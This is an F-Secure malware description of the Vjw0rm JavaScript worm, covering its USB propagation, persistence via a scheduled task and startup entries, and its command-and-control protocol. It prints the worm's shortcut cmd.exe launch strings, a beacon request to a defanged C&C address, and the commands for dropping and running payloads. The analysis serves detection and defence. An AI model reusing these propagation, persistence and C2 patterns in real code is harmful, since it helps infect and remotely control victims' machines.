Worm:JS/Vjw0rm

Classification

Category :

Malware

Type :

Worm

Aliases :

Worm:JS/Vjw0rm, Vjw0rm, Vw0rm

Summary

Vjw0rm is a worm that infects accessible removal storage devices, such as a USB flash drive. It can also execute instructions it receives from a command and control (C&C) server, and stay persistent on the infected machine.

Removal

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

  • Check for the latest database updates

    First check if your F-Secure security program is using the latest updates, then try scanning the file again.

  • Submit a sample

    After checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.

    Note: If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.

  • Exclude a file from further scanning

    If you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.

    Note: You need administrative rights to change the settings.

Technical Details

The Vjw0rm worm is a malicious JavaScript file that spreads by creating copies of itself on accessible removable storage devices.

While active, the worm sends a network request to its C&C server every 7 seconds, providing information about the infected machine and awaiting additional instructions from its operator(s). If it receives instructions, the worm can execute them on the infected machine.

Arrival

This worm can arrive on a computer in several ways:

  1. From an infected removable storage device
  2. Via drive-by download
  3. Downloaded or dropped onto the computer by other malware

Propagation

Once it is present on a computer, the worm can propagate or spread copies of its malicious file by infecting removable storage devices that are inserted and accessible. It does so by performing the following set of actions every 7 seconds:

  1. Identify removal storage devices that are inserted and accessible, using IsReady and DriveType.
  2. Copy the vjw0rm script file into the device's root directory:
    1. Set the script file's attributes as hidden and system
  3. Enumerate all folders and files within the root directory:
    1. Set their attributes to hidden and system (file attributes constant: 0x06 (0x04 + 0x02))
    2. Create a shortcut for each folder/file:
      1. Set the shortcut's icon:
        1. Files: Search for the default icon from registry based on the extension
        2. Folder: Default folder icon from registry
      2. Set the shortcut's target path:
        1. Files: "cmd.exe /c start <dropped_vjw0rm_ScriptName> &start <original_files_path> &exit"
        2. Folder: "cmd.exe /c start <dropped_vjw0rm_ScriptName> &start explorer <original_folders_path> &exit"

Persistence

In addition to propagating itself to maintain its presence, the worm can remain persistent on the infected machine in several ways:

  1. It creates a scheduled task (named 'Skype') that executes the worm's script every 30 minutes
  2. It copies itself to the Startup folder, so that the worm is started each time the machine is booted up
  3. It adds itself to the startup registry folder

Network activity

Vjw0rm contacts a remote C&C server to provide its operator(s) with information about the infected machine, as well as to retrieve any additional instructions they may issue.

Request

Every 7 seconds, the worm sends a POST request with a custom User-Agent to its C&C server. This allows the worm's operator(s) to identify which infected machines are online (and so are available to receive commands), as well as providing some basic information about the machines.

The request can be defined as:

POST [host]:[port]/Vre
User-Agent: [tag]\[logicaldiskserialnum]\[computername]\[username] \[osnamever]\[avdisplayname]\\[vbc_exist]\[prev_infected]\

Where the variables are:

  • def_host & def_port: Pre-defined C&C IP address & port
  • tag: Can be defined both pre- and post-infection. It can be set post-infection through the rename functionality from the C&C server. This is useful for tagging and tracking infected computers
  • logicaldiskserialnum: Logical disk's volume serial number
  • computername & username: These are taken from environment variables
  • osnamever: Gets the operating system version (e.g. Microsoft Windows 7 Enterprise)
  • avdisplayname: Gets the display name of any running anti-virus (works both pre and post Vista by checking both 'winmgts:\\localhost\root\securitycenter' and '...\securitycenter2')
  • vbc_exist: Checks for .NET VBC (Visual Basic Compiler) v2.0.50727
  • prev_infected: Returns the value of the registry key, "HKCU\vjw0rm". This indicates if the user has been previously infected through the worm module, which means that the script has been executed from the root directory of an infected removable storage device

An example of the POST request:

POST 94[.]237[.]68[.]129[:]2828/Vre
User-Agent: HookKernel_A8D34214\MYCOMPUTER\Joe\Microsoft Windows 7 Professional\undefined\\YES\FALSE\
Response

The worm's operator(s) can send a response to the infected machine's POST request that contains commands for the machine to execute. The response can be defined as:

[command][SPL][arg1][SPL][arg2]

Where the variables are:

  • SPL: Delimiter (The default is |V| on both the original C&C executable and the script)
  • command: Remotely issued instructions to be executed
  • arg1 (optional): A payload, usually a script
  • arg2 (optional): Usually a filename

An example of a response that gives instructions to drop and execute an additional script would be:

Sc|V|somescript|V|randomstring.ext

Where Sc is the command for executing an additional malicious module/script, somescript is the actual payload, randomstring is a randomly generated filename, and ext is the extension selected by the operator on the C&C server.

Executing remotely-issued commands

Vjw0rm is also able execute 5 distinct commands, any of which it can receive from the C&C as a response to a POST request. The commands are:

  1. Cl: Kill the script
  2. Sc/RF: Drop and execute additional malicious script
    1. arg1: script payload
    2. arg2: filename
  3. Ex: Execute additional payload
    1. arg1: payload downloader script
  4. Up: Update and execution a new version of the script
    1. arg1: new script
    2. arg2: filename
  5. Un: Uninstall the worm module by removing from startup (Both registry and folder), removing infection identifier (HKCU\vjw0rm), deleting the script file, and quitting
    1. arg1: uninstall script from C&C
  6. Analysis on file: d6636b527c02e882fc8d64eda18b4aafde8afec2